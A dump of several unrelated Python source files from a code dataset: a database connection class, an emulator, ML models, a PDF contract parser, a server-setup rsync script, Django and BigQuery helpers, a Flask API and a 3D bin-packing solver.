ssl=ssl)\n self.c.authenticate(user, password=password, database=database)\n except socket.error as e:\n raise InterfaceError('communication error', e)\n\n Cursor.__init__(self, self)\n self._begin = PreparedStatement(self, 'BEGIN TRANSACTION')\n self._commit = PreparedStatement(self, 'COMMIT TRANSACTION')\n self._rollback = PreparedStatement(self, 'ROLLBACK TRANSACTION')\n self._unnamed_prepared_statement_lock = threading.RLock()\n self.in_transaction = False\n self.autocommit = False\n return\n\n NotificationReceived = property(lambda self: getattr(self.c, 'NotificationReceived'), lambda self, value: setattr(self.c, 'NotificationReceived', value))\n NoticeReceived = property(lambda self: getattr(self.c, 'NoticeReceived'), lambda self, value: setattr(self.c, 'NoticeReceived', value))\n ParameterStatusReceived = property(lambda self: getattr(self.c, 'ParameterStatusReceived'), lambda self, value: setattr(self.c, 'ParameterStatusReceived', value))\n\n def begin(self):\n if 
self.is_closed:\n raise ConnectionClosedError()\n if self.autocommit:\n return\n self._begin.execute()\n self.in_transaction = True\n\n def commit(self):\n if self.is_closed:\n raise ConnectionClosedError()\n self._commit.execute()\n self.in_transaction = False\n\n def rollback(self):\n if self.is_closed:\n raise ConnectionClosedError()\n self._rollback.execute()\n self.in_transaction = False\n\n def close(self):\n if self.is_closed:\n raise ConnectionClosedError()\n self.c.close()\n self.c = None\n return\n\n is_closed = property(lambda self: self.c == None)\n\n def fileno(self):\n return self.c.fileno()\n\n def isready(self):\n return self.c.isready()\n\n def server_version(self):\n return self.c.server_version()\n\n def encoding(self, encoding=None):\n \"\"\"Returns the client_encoding as reported from the connected server\"\"\"\n return self.c.encoding()","sub_path":"pycfiles/lback-0.8.1/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":12657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"174594104","text":"#!/usr/bin/env python\nimport unittest\nfrom analyser_math import percentile\n\nclass test_percentile(unittest.TestCase):\n def test_1(self):\n data = [4, 4,\n 5, 5, 5, 5,\n 6, 6, 6,\n 7, 7, 7,\n 8, 8,\n 9, 9, 9,\n 10, 10, 10]\n p = 25\n self.assertAlmostEqual(5, percentile(p, data))\n \n \n def test_2(self):\n data = [4, 4,\n 5, 5, 5, 5,\n 6, 6, 6,\n 7, 7, 7,\n 8, 8,\n 9, 9, 9,\n 10, 10, 10]\n p = 85\n self.assertAlmostEqual(9.85, percentile(p, data))\n \n \n def test_3(self):\n data = [2, 3, 5, 9]\n p = 50\n self.assertAlmostEqual(4, percentile(p, data))\n\n \n def test_4(self):\n data = [2, 3, 5, 9, 11]\n p = 50\n self.assertAlmostEqual(5, percentile(p, data))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"math_unittest.py","file_name":"math_unittest.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"643902400","text":"#!/usr/bin/env python3\n#\n# The OCPU emulator\n\nimport sys\n\ntry:\n import pygame\nexcept ImportError:\n print(\"The OCPU emulator requires PyGame to be installed!\")\n exit()\n\ntry:\n import emu_utils\nexcept ImportError:\n raise ImportError(\"emu_utils.py does not appear to be present\")\n exit()\n\n\nclass Memory:\n def __init__(self, amount):\n self.data = [0x0000]*amount\n\n def read(self, hex_address):\n converted = int(hex_address)\n if converted > len(self.data):\n print(\"WARNING: Attempt to read from invalid address \" + str(hex_address))\n return 0\n\n return self.data[converted]\n\n def write(self, hex_address, hex_data):\n converted = int(hex_address)\n if converted > len(self.data):\n print(\"WARNING: Attempt to write to invalid address \" + str(hex_address))\n return 0\n\n self.data[converted] = hex_data\n\n\nclass Display:\n def __init__(self, vram_amount):\n pygame.init()\n\n self.dmem = Memory(vram_amount)\n\n dsize = emu_utils.display_size(vram_amount)\n self.dsize = self.width, self.height = dsize[0], dsize[1]\n\n self.screen = pygame.display.set_mode(self.dsize)\n\n def update(self):\n x, y, i = 0, 0, 0\n while y < self.height:\n while x < self.width:\n pygame.Surface.set_at(self,screen, x, y, emu_utils.color(self.dmem[i]))\n i += 1\n x += 1\n y += 1\n\n pygame.display.update()\n\n def clear(self):\n self.dmem = Memory(len(self.dmem))\n\n def set(self, hex_addr, hex_value):\n self.dmem.write(hex_addr, hex_value)\n\n\nclass Registers:\n def 
__init__(self, hex_ram_amount, hex_vram_amount, hex_rom_amount):\n self.data = [0x0000]*0x0D\n self.data[0x09] = hex_vram_amount\n self.data[0x0A] = hex_ram_amount\n self.data[0x0B] = hex_rom_amount\n\n def write(self, reg, data):\n if int(reg) < 9:\n self.data[int(reg)] = data\n else:\n print(\"WARNING: Attmept to write to locked register\", reg)\n\n def read(self, reg):\n return self.data[int(reg)]\n\n def add(self, reg, data):\n self.data[int(reg)] += data\n self.data[int(reg)] = hex(self.data[int(reg)])\n\n def sub(self, reg, data):\n self.data[int(reg)] -= data\n self.data[int(reg)] = hex(self.data[int(reg)])\n\n\ndef main(mem_amount, vmem_amount, romfile): # Master (and monster) function\n print(\"Init registers\")\n regs = Registers(mem_amount, vmem_amount, 65535 - (mem_amount + vmem_amount)) # Initialize registers\n\n print(\"Init mem\", mem_amount)\n sys_mem = Memory(mem_amount) # Initialize RAM\n\n print(\"Init display\", vmem_amount)\n display = Display(vmem_amount) # Init display\n\n # Instruction function definitions\n def load(reg, dataH, dataL):\n full_data = emu_utils.concat_hex(dataH, dataL)\n regs.write(reg, full_data)\n\n def store(reg, addrH, addrL):\n full_addr = emu_utils.concat_hex(addrH, addrL)\n if full_addr <= mem_amount:\n sys_mem.write(full_addr, regs.read(reg))\n elif full_addr <= mem_amount + vmem_amount:\n display.set(regs.read(reg), full_addr - (mem_amount))\n elif full_addr <= (65535 - (mem_amount + vmem_amount)):\n print(\"ERROR: Cannot write to ROM\")\n\n def add(reg, reg2):\n regs.add(reg, regs.read(reg2))\n\n def sub(reg, reg2):\n regs.sub(reg, regs.read(reg2))\n\n def mov(reg, reg2):\n regs.write(reg2, regs.read(reg))\n regs.write(reg, 0x0000)\n\n def ifeq(reg, dataH, dataL):\n full_data = emu_utils.concat_hex(addrH, addrL)\n if regs.read(reg) == full_data:\n return True\n else:\n return False\n\n def neq(reg, dataH, dataL):\n if ifeq(reg, dataH, dataL):\n return False\n else:\n return True\n\n def noop():\n print(\"NOOP\")\n\n # Parser functions\n exec_line = True\n def parse_inst(inst, arg1, arg2, arg3):\n print(inst, arg1, arg2, arg3)\n if inst == 0x00:\n print(\"load\", arg1, arg2, arg3)\n load(arg1, arg2, arg3)\n elif inst == 0x10:\n print(\"store\", arg1, arg2, arg3)\n store(arg1, arg2, arg3)\n elif inst == 0x20:\n print(\"add\", arg1, arg3)\n add(arg1, arg3)\n elif inst == 0x30:\n print(\"sub\", arg1, arg3)\n sub(arg1, arg3)\n elif inst == 0x40:\n print(\"move\", arg1, arg3)\n mov(arg1, arg3)\n elif inst == 0x80:\n print(\"ifeq\", arg1, arg2, arg3)\n exec_line = ifeq(arg1, arg2, arg3)\n elif inst == 0x81:\n print(\"neq\", arg1, arg2, arg3)\n exec_line = neq(arg1, arg2, arg3)\n elif inst == 0xFF:\n print(\"System halt\")\n sys.exit()\n else:\n noop()\n\n def parse_rom(file):\n data = emu_utils.read_rom(file)\n i, j = 0, 0\n while True:\n i = j\n j += 4\n inst_ln = [0x00,0x00,0x00,0x00]\n while i < j:\n inst_ln.append(sys_mem.read(i))\n i += 1\n\n if exec_line == True:\n parse_inst(inst_ln[0], inst_ln[1], inst_ln[2], inst_ln[3])\n\n parse_rom(romfile)\n\nif __name__ == \"__main__\":\n args = sys.argv\n\n vmem = 8192\n mem = 24576\n\n if len(args) <= 1:\n print(\"Usage:\", args[0], \" [--mode 0|1|2|3|4]\")\n exit()\n\n romfile = args[1]\n\n if len(args) == 3:\n if args[3] == \"0\":\n vmem = 4096\n mem = 8192\n elif args[3] == \"1\":\n vmem = 8192\n mem = 8192\n elif args[3] == \"2\":\n vmem = 8192\n mem = 24576\n elif args[3] == \"3\":\n vmem = 16384\n mem = 32768\n elif args[3] == \"4\":\n vmem = 8192\n mem = 49152\n\n main(mem, vmem, 
romfile)\n","sub_path":"emu_main.py","file_name":"emu_main.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"26649190","text":"\"\"\"\nModel definition for CNN sentiment training\n\"\"\"\n\nimport os\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Embedding, Convolution1D, GlobalMaxPool1D\nimport tensorflow.keras as keras\nimport numpy as np\n\ndef keras_model_fn(_, config):\n \"\"\"\n Creating a CNN model for sentiment modeling\n \"\"\"\n\n embedding_matrix = read_dictionary('s3://ai-assignment/assignment6/glove.50d.txt',config[\"embeddings_dictionary_size\"],config[\"embeddings_vector_size\"])\n\n cnn_model = Sequential()\n cnn_model.add(Embedding(weights=[embedding_matrix], input_length = config[\"padding_size\"],input_dim = config[\"embeddings_dictionary_size\"],output_dim = config[\"embeddings_vector_size\"], trainable = True))\n cnn_model.add(Convolution1D(filters=200,kernel_size=3,strides = 1, padding='valid',activation = 'relu'))\n cnn_model.add(MaxPool1D(pool_size = 2))\n cnn_model.add(Convolution1D(filters=100,kernel_size=2,strides = 1, padding='valid',activation = 'relu'))\n cnn_model.add(GlobalMaxPool1D())\n cnn_model.add(Dense(units=100, activation = 'relu'))\n cnn_model.add(Dense(units=1, activation = 'sigmoid'))\n Adam = keras.optimizers.Adam(lr=0.005, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\n cnn_model.compile(loss = 'binary_crossentropy', optimizer = 'Adam', metrics =['accuracy'])\n\n return cnn_model\n\ndef save_model(model, output):\n\n \"\"\"\n Method to save a model in SaveModel format with signature to allow for serving\n \"\"\"\n\n print(\"Saving model...\")\n\n tf.saved_model.save(model, os.path.join(output, \"1\"))\n\n print(\"Model successfully saved at: {}\".format(output))\n","sub_path":"model_training/sentiment_model_cnn.py","file_name":"sentiment_model_cnn.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551816482","text":"import re\nimport random\nimport os\nimport subprocess\nimport numpy as np\nimport pandas as pd\nimport tabula\nfrom IPython.display import HTML\n\ndef loadKeywords():\n with open('./data/keyword_fields.txt') as f:\n data = f.readlines()\n data.sort(key=len, reverse=True)\n field_regex = re.compile('|'.join([dt.replace('\\n', '') for dt in data if dt != '\\\\w+ #\\n']).replace(' ', '\\s'))\n return field_regex\n\ndef dateRegex():\n date_range_regex = re.compile(r'[0-9]{2}\\/[0-9]{2}\\/[0-9]{2}\\s*-\\s*[0-9]{2}\\/[0-9]{2}\\/[0-9]{2}')\n date_regex = re.compile(r'[0-9]{2}\\/[0-9]{2}\\/[0-9]{2}')\n return date_regex, date_range_regex\n\ndef showPDF(filepath):\n return HTML('' % (filepath))\n\ndef doTabula(inputFile, nospreadsheet, guessArea=False, pages='all'):\n tabula.convert_into(inputFile, output_path='/tmp/convertedFCCFile.txt', output_format='csv', guess=guessArea, pages=pages, nospreadsheet=nospreadsheet)\n df = pd.read_csv('/tmp/convertedFCCFile.txt', names=range(0,7))\n return df\n\ndef readPdfToText(inputFile):\n os.system(\"pdftotext -layout '%s' '%s'\" % (inputFile, 'test.txt'))\n pdfContent = subprocess.check_output(\"pdftotext -layout '%s' '%s'\" % (inputFile, '-'), shell=True).decode()\n pdfLines = pdfContent.split('\\n')\n df_rows = []\n for line in pdfLines:\n field_lines = [field for field in re.split('\\s{2,}', line) if field != '']\n 
if len(field_lines) > 1:\n df_rows.append(field_lines)\n df = pd.DataFrame.from_records(df_rows)\n return df\n\ndef generateMatrixLookup(df, field_regex=loadKeywords()):\n valueMatrix = df.as_matrix()\n headerMatrix = df.applymap(lambda x: field_regex.findall(x) if type(x) == str else False).as_matrix()\n return headerMatrix, valueMatrix\n\ndef extractFields(headerMatrix, valueMatrix, extraction_method):\n extracted_fields = []\n (lx,ly) = headerMatrix.shape\n for x in range(0, lx):\n for y in range(0,ly):\n current_field = headerMatrix[x,y]\n if current_field:\n if extraction_method == 'medial' and x < lx-1:\n target_field = valueMatrix[x+1,y]\n elif extraction_method == 'lateral' and y < ly-1:\n target_field = valueMatrix[x,y+1]\n extracted_fields.append((current_field,target_field))\n return extracted_fields\n\ndef filterExtractedFields(extracted_fields, date_range_regex=dateRegex()[1], lazy=False):\n finalized_meta = {}\n for field, value in extracted_fields:\n if not pd.isnull(value):\n if field[0] == 'Contract / Revision' and not pd.isnull(value):\n finalized_meta['altOrder'] = value.split(' ')[0] if type(value) == str else value\n if field[0] in ['Contract Dates', 'Schedule Dates']:\n finalized_meta['flightDates'] = value\n if field[0] == 'Demographic':\n finalized_meta['Demographic'] = value\n if len(field) == 1 and field[0] == 'Advertiser':\n finalized_meta['Advertiser'] = value\n if len(field) == 1:\n if ' / ' in field[0]:\n finalized_meta.update(dict(zip(field[0].split(' / '), value.split(' / '))))\n if len(field) > 2:\n if 'Period' in field and 'Spots' in field:\n matched_date = date_range_regex.findall(value)[0]\n value = value.replace(matched_date, matched_date.replace(' ', ''))\n finalized_meta.update(dict(zip(field, value.split(' '))))\n #if field[2] == 'Gross Amount':\n # finalized_meta['total'] = value.split(' ')[-1]\n #finalized_meta[field]\n if lazy:\n if len(field) == 1 and not pd.isnull(value):\n finalized_meta[field[0].strip()] = value.strip()\n return finalized_meta\n\ndef layoutClassifier(inputFile):\n layout_regex = ['Print Date', 'Contract Agreement Between', 'Page .+ of .+', 'Remit To', 'CONTRACT NO']\n layout_meta = [\n {\n 'regex': 'Contract Agreement Between',\n 'nospreadsheet': False,\n 'parser': 'tabula',\n 'lazy': True,\n 'extraction_method': 'medial'\n },\n {\n 'regex': 'Page .+ of .+',\n 'nospreadsheet': True,\n 'parser': 'tabula',\n 'lazy': True,\n 'extraction_method': 'lateral'\n },\n {\n 'regex': 'Print Date',\n 'nospreadsheet': False,\n 'parser': 'pdfToText',\n 'lazy': True,\n 'extraction_method': 'lateral'\n },\n {\n 'regex': 'Remit To',\n 'nospreadsheet': False,\n 'parser': 'tabula',\n 'lazy': True,\n 'extraction_method': 'lateral'\n }\n ]\n layout_types = [re.compile(str.encode(t['regex'])) for t in layout_meta]\n first_line = subprocess.check_output(\"pdftotext -l 1 '%s' '%s' | head -n1\" % (inputFile, '-'), shell=True)\n print(first_line)\n for pattern_index, pattern in enumerate(layout_types):\n if pattern.match(first_line):\n return layout_meta[pattern_index], pattern\n return None, None \n#lineMatch = re.compile(b'(Print Date)|(Contract Agreement Between)|(Page .+ of .+)|(Remit To)|(CONTRACT NO)|(Print Date)')\n#for file in scanFiles('./downloads'):\n# if '.pdf' in file:\n# first_line = subprocess.check_output(\"pdftotext -l 1 '%s' '%s' | head -n1\" % (file, '-'), shell=True)\n# if not lineMatch.match(first_line):\n# 
print(first_line)","sub_path":"pifParser.py","file_name":"pifParser.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"355950707","text":"'''program that calculates the minimum fixed monthly payment needed in order pay off a credit card balance within 12 months.\n'''\nbalance=3926\nannualInterestRate=0.2\nfixedmonthlypayment=0\nunpaid=balance-fixedmonthlypayment\nwhile unpaid>0:\n b=balance\n fixedmonthlypayment=fixedmonthlypayment+10\n for month in range(1,13):\n unpaid=b-fixedmonthlypayment\n Interest=(unpaid*annualInterestRate)/12\n b=unpaid+Interest\nprint(\"Lowest Payment: \"+str(fixedmonthlypayment))","sub_path":"scripts/inayear.py","file_name":"inayear.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"244796540","text":"from multiprocessing import Process\nimport os\n\n\ndef setup(server):\n os.system('/usr/bin/rsync -aL --progress -e \"ssh -i ~/Research.pem\" ~/Current_Project/Main/ServerSetup/GPU_VM_Setup.sh ubuntu@' + server +':~/')\n os.system('ssh -i \"~/Research.pem\" ubuntu@' + server + ' \"bash GPU_VM_Setup.sh\"')\n os.system('/usr/bin/rsync -avLR -e \"ssh -i ~/Research.pem\" ~/./Current_Project/Main/*.py ubuntu@' + server +':~/')\n os.system('/usr/bin/rsync -avLR -e \"ssh -i ~/Research.pem\" ~/./Current_Project/Main/DB/TrainData/Train_*_ready.npz ubuntu@' + server +':~/')\n\n return\n\ndef Configure_Servers(servers):\n\n procs = []\n for server in servers:\n proc = Process(target=setup, name=server, args=(server,))\n procs.append(proc)\n proc.start()\n for proc in procs:\n proc.join()\n return\n\n\nif __name__ == '__main__':\n servers = ['ec2-18-219-47-209.us-east-2.compute.amazonaws.com']\n Configure_Servers(servers)\n\n\n\n\n","sub_path":"SolarForecast/ServerScript.py","file_name":"ServerScript.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"281409174","text":"import os, sys\n\nfile_object = open(\"/Users/Zenith/Desktop/target.xml\", \"w\")\nsearch_text = \"src=\\\"http://www.zenitheos.com/wp-content/uploads/2014/04/\"\nreplace_text = \"src=\\\"http://www.zenitheos.com/wp-content/uploads/\"\n#input_file = sys.stdin\ninput_file = open(\"/Users/Zenith/Desktop/data.xml\")\noutput_file = sys.stdout\n\nfor s in input_file:\n #output_file.write(s.replace(search_text, replace_text))\n file_object.write(s.replace(search_text, replace_text))\n #file_object.close()\n\n#output_file.close()\n#file_object.close()\n#input_file.close()","sub_path":"editText.py","file_name":"editText.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"201147698","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 8 21:39:01 2016\n\n@author: jc\n\"\"\"\n\nimport Tkinter as tk\nimport sys\n\n## Définition des variables ---------------------------------------------------\nserverName = \"bord3l\"\nserverPort = 1883\n\n## ----------------------------------------------------------------------------\ndef publish(temp):\n # Connexion au broker mqtt\n mqttc = mosquitto.Client()\n mqttc.connect(serverName, serverPort)\n \n if len(temp) == 3:\n mqttc.publish(\"etudeje/NouvelOutil/\"+temp0+\"/genre\", temp1)\n mqttc.publish(\"etudeje/NouvelOutil/\"+temp0+\"/photo\", temp2)\n \n mqttc.loop(2)\n return 0\n \n\nclass 
Interface(tk.Frame):\n def __init__(self, root):\n tk.Frame.__init__(self, root)\n self.pack()\n \n # Création de la frame de boutons\n self.mainFrame = tk.LabelFrame(self)\n self.mainFrame.pack(side=\"left\")\n self.frame1 = tk.Frame(self.mainFrame)\n self.frame1.pack(expand='true', fill='x')\n self.frame2 = tk.Frame(self.mainFrame)\n self.frame2.pack(expand='true', fill='x')\n self.frame3 = tk.Frame(self.mainFrame)\n self.frame3.pack(expand='true', fill='x')\n self.frame4 = tk.Frame(self.mainFrame)\n self.frame4.pack(expand='true', fill='x')\n self.frame5 = tk.Frame(self.mainFrame)\n self.frame5.pack(expand='true', fill='x')\n \n # Cration des boutons\n \n # Nom de l'outil\n self.toolName = tk.StringVar()\n self.toolName.set('')\n tk.Label(self.frame1, text=\"Entrez le nom de l'outil\").pack(side=\"left\")\n tk.Entry(self.frame1, textvariable=self.toolName).pack(anchor='w')\n # Boite de dialogue pour la photo\n # Plutot upload de la photo\n \n # Bouton Scanner\n tk.Button(self.frame4, text='Lancer un scan', command=self.scan).pack(anchor='w')\n # Bouton enregistrer\n tk.Button(self, text=\"Enregistrer l'outil\", command=self.save).pack(anchor='w')\n # Bouton Quitter\n tk.Button(self.frame5, text='Quitter', command=self.quit).pack(anchor='w')\n \n def scan(self):\n # Checker les conditions avant de lancer un scan\n # Subprocess tout ca\n #if trop d'étiquettes ou pas d'étiquettes --> soucis\n return 0\n \n def save(self):\n # Upload de la photo\n toolName = self.toolName.get()\n etiquetteId = self.etiquetteId.get()\n photo = self.photo.get()\n publish([etiquetteId, toolName, photo])\n return 0\nif __name__ == '__main__':\n root = tk.Tk()\n inter = Interface(root)\n \n root.mainloop()\n sys.exit(0)\n ","sub_path":"ordinateur/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"280313785","text":"from django.contrib.admin import ModelAdmin\nfrom django.contrib.auth.models import User\nfrom django.forms.models import model_to_dict\n\n\ndef diff_changes_model(obj_a, obj_b):\n klass = obj_a.__class__\n\n diff_map = {}\n\n if obj_a and not obj_b:\n return model_to_dict(obj_a)\n\n for field in klass._meta.fields:\n display = \"get_%s_display\"\n\n def default_func():\n return None\n\n val_a = (\n getattr(obj_a, display % field.name, default_func)() or\n getattr(obj_a, field.name, None)\n )\n val_b = (\n getattr(obj_b, display % field.name, default_func)() or\n getattr(obj_b, field.name, None)\n )\n\n if val_a != val_b:\n diff = u\"{0} --> {1}\".format(val_a, val_b)\n diff_map[field.name] = diff\n\n return diff_map\n\n\ndef construct_change_message(obj, formsets, add, dic_changes={}):\n \"\"\"\n Construct a JSON structure describing changes from a changed object.\n Translations are deactivated so that strings are stored untranslated.\n Translation happens later on LogEntry access.\n \"\"\"\n change_message = []\n if add:\n change_message.append({'added': dic_changes})\n elif obj:\n change_message.append({'changed': {'fields': dic_changes}})\n\n return change_message\n\n\ndef log_changes(request, obj_start, obj_end, add=True):\n obj_changes = u''\n\n modeladmin = ModelAdmin(User, ModelAdmin)\n if add:\n obj_changes = u'Objeto adicionado'\n modeladmin.log_addition(request, obj_end)\n else:\n obj_changes = diff_changes_model(obj_start, obj_end)\n\n modeladmin.log_change(request, obj_end, {'changed': obj_changes})\n return obj_changes\n\n\ndef 
log_changes_before_save(request, obj_end):\n klass = obj_end.__class__\n obj_start = klass.objects.filter(pk=obj_end.pk).first()\n add = not obj_start\n\n return log_changes(request, obj_start, obj_end, add=add)\n","sub_path":"logentry_admin/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"590057308","text":"import json\nfrom google.cloud import bigquery\nfrom modules import constants\nfrom jinja2 import Template\nfrom modules import validation\n\n# Construct a BigQuery client object.\nclient = bigquery.Client()\n\n\ndef run_bq_query(query):\n query_job = client.query(query)\n records = [dict(row) for row in query_job]\n data = json.loads(json.dumps((records)))\n return data\n\n\ndef get_deployment_info(address, chain):\n valid, data = validation.validate_bq_args(address, chain)\n if valid:\n query_template = Template(constants.SQL_DEPLOYMENT_INFORMATION)\n query = query_template.render(\n contract_address=address.lower(), chain=chain)\n data = run_bq_query(query)[0]\n\n return data\n\n\ndef get_deployed_contracts(address, chain):\n\n valid, data = validation.validate_bq_args(address, chain)\n print(valid, data)\n if valid:\n query_template = Template(constants.SQL_DEPLOYED_CONTRACTS)\n query = query_template.render(\n deployer_address=address.lower(), chain=chain)\n data = run_bq_query(query)\n\n return data\n","sub_path":"contract-parser-api/modules/bq.py","file_name":"bq.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"381985486","text":"import numpy as np\nimport layer\n\nclass network_classifier():\n\n def __init__(self,n_neurons,n_layers,n_inputs):\n self.n_neurons = n_neurons\n self.n_layers = n_layers\n self.learning_rate = 0.0001\n def fit(self,X,Y):\n self.n_inputs = X.shape[1]\n self.labels = np.unique(Y) \n self.layers = [layer.layer(self.n_neurons,self.n_inputs)] + [layer.layer(self.n_neurons,self.n_neurons) for i in range(self.n_layers)] + [layer.layer(len(self.labels),self.n_neurons)]\n self.Y = np.zeros([Y.shape[0],len(self.labels)])\n for i in Y:\n self.Y[i][int(Y[i][0])] = 1\n \n \n def feed_forward(self,X):\n for layer in self.layers:\n X = layer.feed_forward(X)\n return X\n def error(self,X,Y):\n p = self.feed_forward(X)\n return 1/2 * sum((Y - p)**2)\n def relu_deriv(self,Z):\n return Z > 0\n def output_layer_errors(self,Y,A):\n return np.multiply((Y - A),relu_deriv(layer[-1].Z))\n def layer_N_errors(self,d,layer2,layer1):\n return np.multiply(np.dot(layer2.weights,d),relu_deriv(layer1.Z))\n\n def back_prop(self,Y,A):\n arr = []\n d = self.output_layer_errors(Y,A)\n arr.append(d)\n for i in range(len(layers)-2,-1,-1):\n d = self.layer_N_errors(self,d,self.layers[i+1],self.layers[i])\n arr.append(d)\n\n \nif __name__ == '__main__':\n\n n = network(10,10,10)\n X = np.random.randint(1,9,[10,10])\n Y = np.random.randint(1,9,[1,10])\n n.fit(X,Y)\n sample = np.random.randint(1,9,[10,10])\n print(n.feed_forward(sample))\n\n\n\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"376178976","text":"import flask\nimport flask_restful\nfrom flask_restful import reqparse\n\napp = flask.Flask(__name__)\napi = flask_restful.Api(app)\n\n\ndef multiply(x, y):\n return x * y\n\n\nclass 
HelloJustin(flask_restful.Resource):\n def get(self):\n parser = reqparse.RequestParser()\n\n parser.add_argument(\"param1\")\n parser.add_argument(\"param2\")\n args = parser.parse_args()\n\n param1 = args[\"param1\"]\n param2 = args[\"param2\"]\n\n if not param1 or not param2:\n return {\n \"state\": 0,\n \"response\": None\n }\n\n param1 = int(param1)\n param2 = int(param2)\n\n result = multiply(param1, param2)\n return {\n \"state\": 1,\n \"response\": result\n }\n\n\napi.add_resource(HelloJustin, \"/api/multiply\")\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"py-basic-programming/tdd/using_flask/api/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323685847","text":"\n# coding: utf-8\n\n\nimport random\nimport numpy as np\nfrom math import *\nimport pandas as pd\nimport xlwt\nimport time\nimport multiprocessing\nimport copy\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n\nbest_individ = [] \nbest_fit = 0\nL = W = H = 0\n\nclass coord:\n def __init__(self, x, y, z): \n self.x = x\n self.y = y\n self.z = z\n def get_coordinates(self):\n return (self.x, self.y, self.x)\n \n def __eq__(self,other):\n if type(other) is type(self):\n return self.__dict__ == other.__dict__\n return False\n \n def __hash__(self):\n return hash(tuple(sorted(self.__dict__.items())))\n \n def __repr__(self):\n return (\"\\n\\t x: {},\"\n + \"\\n\\t y: {},\"\n + \"\\n\\t z: {}\").format(self.x, self.y, self.z)\n \nclass item:\n def __init__(self, id, length, width, height):\n self.id = id\n self.l = length\n self.w = width\n self.h = height\n self.volume = length * width * height\n self.position = coord(0,0,0)\n self.rotation = 0\n self.new_l = length\n self.new_w = width\n self.new_h = height\n\n \n def __repr__(self):\n return (\"\\n Cont.L or position.y + item.new_w > Cont.W or position.z + item.new_h > Cont.H:\n rotation+=1\n flag = 1\n \n else: \n if Cont.PI:\n if position.z == 0:\n for pack_it in Cont.PI:\n if pack_it.position.z == 0: \n if pack_it.position.x > position.x and pack_it.position.x < position.x + item.new_l:\n if pack_it.position.y + pack_it.new_w > position.y:\n rotation+=1\n flag = 1\n \n\n if pack_it.position.x < position.x and pack_it.position.x + pack_it.new_l > position.x:\n if position.y + item.new_w > pack_it.position.y:\n rotation+=1\n flag = 1\n\n if pack_it.position.y > position.y and position.y + item.new_w > pack_it.position.y:\n if pack_it.position.x + pack_it.new_l > pack_it.position.x:\n rotation+=1\n flag = 1\n if pack_it.position.y < position.y and pack_it.position.y + pack_it.new_w > position.y:\n if position.x + item.new_l > pack_it.position.x:\n rotation+=1\n flag = 1\n\n else:\n if pack_it.position.x < position.x and pack_it.position.x + pack_it.new_l > position.x:\n if position.y + item.new_w > pack_it.position.y and position.y <= pack_it.position.y or position.y > pack_it.position.y and pack_it.position.y + pack_it.new_w > position.y:\n if position.z + item.new_h > pack_it.position.z:\n rotation+=1\n flag = 1\n\n if pack_it.position.x > position.x and position.x + item.new_l > pack_it.position.x:\n if position.y < pack_it.position.y + pack_it.new_w and position.y >= pack_it.position.y or position.y < pack_it.position.y and pack_it.position.y < position.y+item.new_w:\n if position.z + item.new_h > pack_it.position.z:\n rotation+=1 \n flag = 1\n\n if pack_it.position.y + pack_it.new_w > position.y and 
position.y > pack_it.position.y:\n if position.x <= pack_it.position.x and position.x + item.new_l > pack_it.position.x or position.x > pack_it.position.x and pack_it.position.x + pack_it.new_l > position.x:\n if position.z + item.new_h > pack_it.position.z:\n rotation+=1\n flag = 1\n\n if pack_it.position.y < position.y + item.new_w and position.y < pack_it.position.y:\n if position.x >= pack_it.position.x and pack_it.position.x + pack_it.new_l > position.x or position.x < pack_it.position.x and position.x + item.new_l > pack_it.position.x:\n if position.z + item.new_h > pack_it.position.z:\n rotation+=1\n flag = 1\n\n\n else: #if position.z > 0\n for pack_it in Cont.PI:\n if pack_it.position.z + pack_it.new_h > position.z and pack_it.position.z < position.z:\n\n if pack_it.position.y == position.y or pack_it.position.y < position.y and pack_it.position.y + pack_it.new_w > position.y or pack_it.position.y > position.y and position.y + item.new_w > pack_it.position.y:\n if position.x + item.new_l > pack_it.position.x and position.x < pack_it.position.x:\n rotation+=1\n flag = 1\n\n if pack_it.position.x == position.x or pack_it.position.x < position.x and pack_it.position.x + pack_it.new_l > position.x or pack_it.position.x > position.x and position.x + item.new_l > pack_it.position.x:\n if position.y + item.new_w > pack_it.position.y and position.y < pack_it.position.y:\n rotation+=1\n flag = 1\n\n if pack_it.position.z == position.z:# объединить с первым условием\n if pack_it.position.x > position.x and pack_it.position.x < position.x + 